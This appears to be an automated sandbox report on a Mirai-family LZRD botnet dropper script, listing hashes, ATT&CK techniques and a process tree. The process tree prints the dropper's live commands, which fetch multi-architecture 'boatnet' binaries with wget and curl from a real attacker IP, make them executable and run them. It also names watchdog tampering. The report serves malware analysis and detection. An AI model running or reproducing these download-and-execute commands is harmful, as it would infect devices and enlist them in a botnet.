mirai | cb69d62b52dd6917dbde67db70d37db577ea3fa002bb6f9fd6d88354f84a5a57

Analysis

max time kernel
150s
max time network
149s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
12-01-2025 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

e25f891adc7a50ef0de34587b5d59e24
SHA1

90118fabbbb484f6d7e3d94d5128cac84ca384d5
SHA256

cb69d62b52dd6917dbde67db70d37db577ea3fa002bb6f9fd6d88354f84a5a57
SHA512

cdd371403ebe19b4fc4a57fe5f48cf967f3baa2b11c8ab6abc69734c631209d8a1c45f17053d2f07e8fd5efe0f17420d661261b820fb07b01f820761270d13e0

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
833	chmod
874	chmod
746	chmod
820	chmod
898	chmod
852	chmod
880	chmod
791	chmod
868	chmod
807	chmod
814	chmod
886	chmod
892	chmod
735	chmod
771	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	736	WTF
/tmp/WTF	748	WTF
/tmp/WTF	773	WTF
/tmp/WTF	793	WTF
/tmp/WTF	809	WTF
/tmp/WTF	815	WTF
/tmp/WTF	821	WTF
/tmp/WTF	834	WTF
/tmp/WTF	853	WTF
/tmp/WTF	869	WTF
/tmp/WTF	875	WTF
/tmp/WTF	881	WTF
/tmp/WTF	887	WTF
/tmp/WTF	893	WTF
/tmp/WTF	899	WTF

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTF
File opened for modification	/bin/watchdog	WTF

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-4.dat	upx
behavioral3/files/fstream-7.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/803/cmdline	WTF
File opened for reading	/proc/811/cmdline	WTF
File opened for reading	/proc/818/cmdline	WTF
File opened for reading	/proc/880/cmdline	WTF
File opened for reading	/proc/680/cmdline	WTF
File opened for reading	/proc/702/cmdline	WTF
File opened for reading	/proc/775/cmdline	WTF
File opened for reading	/proc/826/cmdline	WTF
File opened for reading	/proc/890/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/861/cmdline	WTF
File opened for reading	/proc/872/cmdline	WTF
File opened for reading	/proc/883/cmdline	WTF
File opened for reading	/proc/896/cmdline	WTF
File opened for reading	/proc/782/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/705/cmdline	WTF
File opened for reading	/proc/708/cmdline	WTF
File opened for reading	/proc/788/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/884/cmdline	WTF
File opened for reading	/proc/895/cmdline	WTF
File opened for reading	/proc/562/cmdline	WTF
File opened for reading	/proc/837/cmdline	WTF
File opened for reading	/proc/871/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/697/cmdline	WTF
File opened for reading	/proc/772/cmdline	WTF
File opened for reading	/proc/841/cmdline	WTF
File opened for reading	/proc/855/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/689/cmdline	WTF
File opened for reading	/proc/787/cmdline	WTF
File opened for reading	/proc/794/cmdline	WTF
File opened for reading	/proc/796/cmdline	WTF
File opened for reading	/proc/828/cmdline	WTF
File opened for reading	/proc/878/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/701/cmdline	WTF
File opened for reading	/proc/757/cmdline	WTF
File opened for reading	/proc/776/cmdline	WTF
File opened for reading	/proc/780/cmdline	WTF
File opened for reading	/proc/853/cmdline	WTF
File opened for reading	/proc/856/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/502/cmdline	WTF
File opened for reading	/proc/812/cmdline	WTF
File opened for reading	/proc/862/cmdline	WTF
File opened for reading	/proc/866/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/789/cmdline	WTF
File opened for reading	/proc/844/cmdline	WTF
File opened for reading	/proc/889/cmdline	WTF
File opened for reading	/proc/515/cmdline	WTF
File opened for reading	/proc/764/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/558/cmdline	WTF
File opened for reading	/proc/707/cmdline	WTF
File opened for reading	/proc/800/cmdline	WTF
File opened for reading	/proc/815/cmdline	WTF

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
738	wget
739	curl
745	cat

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.arm7	curl
File opened for modification	/tmp/boatnet.spc	curl
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.arm6	wget
File opened for modification	/tmp/boatnet.arm5	curl
File opened for modification	/tmp/boatnet.m68k	curl
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.mpsl	wget
File opened for modification	/tmp/boatnet.arm5	wget
File opened for modification	/tmp/boatnet.ppc	curl
File opened for modification	/tmp/boatnet.sh4	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.ppc	wget
File opened for modification	/tmp/boatnet.i686	wget
File opened for modification	/tmp/boatnet.x86_64	wget
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.spc	wget
File opened for modification	/tmp/boatnet.sh4	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.arm6	curl
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm7	wget
File opened for modification	/tmp/boatnet.m68k	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:705
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:709
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:733
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:734
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-7cf44965fc8343cabf2d3214572ac32c-systemd-timedated.service-oIEbSN WTF
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:736
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:738
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:739
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:745
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-7cf44965fc8343cabf2d3214572ac32c-systemd-timedated.service-oIEbSN WTF
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:748
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:752
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:770
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:773
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.i468
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.i468
  2⤵
  - Writes file to tmp directory
  PID:780
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:790
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:793
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.i686
  2⤵
  - Writes file to tmp directory
  PID:796
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat boatnet.i686
  2⤵
  PID:806
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:809
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.x86_64
  2⤵
  - Writes file to tmp directory
  PID:811
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/cat
  cat boatnet.x86_64
  2⤵
  PID:813
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:815
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:817
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/cat
  cat boatnet.mpsl
  2⤵
  PID:819
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:821
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:823
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:824
- /bin/cat
  cat boatnet.arm
  2⤵
  PID:831
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:834
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:837
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:843
- /bin/cat
  cat boatnet.arm5
  2⤵
  PID:851
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:853
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:856
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/cat
  cat boatnet.arm6
  2⤵
  PID:867
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:869
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:871
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/cat
  cat boatnet.arm7
  2⤵
  PID:873
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:875
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:877
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:878
- /bin/cat
  cat boatnet.ppc
  2⤵
  PID:879
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:881
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:883
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/cat
  cat boatnet.spc
  2⤵
  PID:885
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:887
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:889
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:890
- /bin/cat
  cat boatnet.m68k
  2⤵
  PID:891
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:893
- /usr/bin/wget
  wget http://94.158.245.27/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:895
- /usr/bin/curl
  curl -O http://94.158.245.27/hiddenbin/boatnet.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:896
- /bin/cat
  cat boatnet.sh4
  2⤵
  PID:897
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:899

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
31KB

MD5
21165b8b4e986efc031cd41016dde6b6

SHA1
39ce8fe9071745d8f2f5493b243376dbd5418a36

SHA256
a61b712082a6c62842aa60f98806b2daf292a54119ae5f4d422fee3239fc5c86

SHA512
96a0d5ee860f38716f07780d9b47949851f6cc8284d17278d0a432b36a1dfd879966c160abb43ef294bfd6047504f84019ae51639f8ede3e00ab76502671c0ed

Download Submit
/tmp/WTF

Filesize
121KB

MD5
b2137fad57343a2c54f4167b42c52b4f

SHA1
3e2dfcd9b129e9502ef854f7451f7299812036ba

SHA256
cdd7d9565af3469b9a821239429b637797480fdc5e7f42095b948da44fe47921

SHA512
e9e5db39f798746dd16435db13548964d6e71f3002fb6123e7f0f3436c8f340a394701acf87b00bcce9c5176e89c0d46bf33ca51184d78ad7928a77cdff91d3c

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/WTF

Filesize
31KB

MD5
fbc0418c5814b38ea0700dd88bcaa9a3

SHA1
9890e3e3e8428a490404f3c037b3a4440cd98c0d

SHA256
6180a72b71fd89c5aa94c451434ae2bce4ab8e47b746105345542ffb4ceec762

SHA512
5f9c6048e39e9f7cc9c91e52097e0762e991d40952a467783e7ad17d4704a6f92de9d89334c30a3471b2c3e4f502a331c0ffb55435fa95afb12c5eb27b5eb63a

Download Submit
/tmp/WTF

Filesize
81KB

MD5
26351d226a4e7b04aa180a044dba1d14

SHA1
82709b83511bab77d6aea2ad1283b5470570aff3

SHA256
70d6b5db633fa0992d1a3d0e625b3d530f840dc5971273c2707285d34c7bc9b1

SHA512
a47f6c44eae33b2ed3d7809cd3e0d31ba158ca686fe4c3f3162f80d5fb110b1dd268379df8e95ff193613694a0946dadb14add6f85f7e7214bc96d7442b2bd74

Download Submit
/tmp/boatnet.x86

Filesize
29KB

MD5
545dbe1d228295c958b5a3f6ec4d8278

SHA1
f8dff366ea07681be596cdb33911c3f4119d0763

SHA256
a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

SHA512
fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads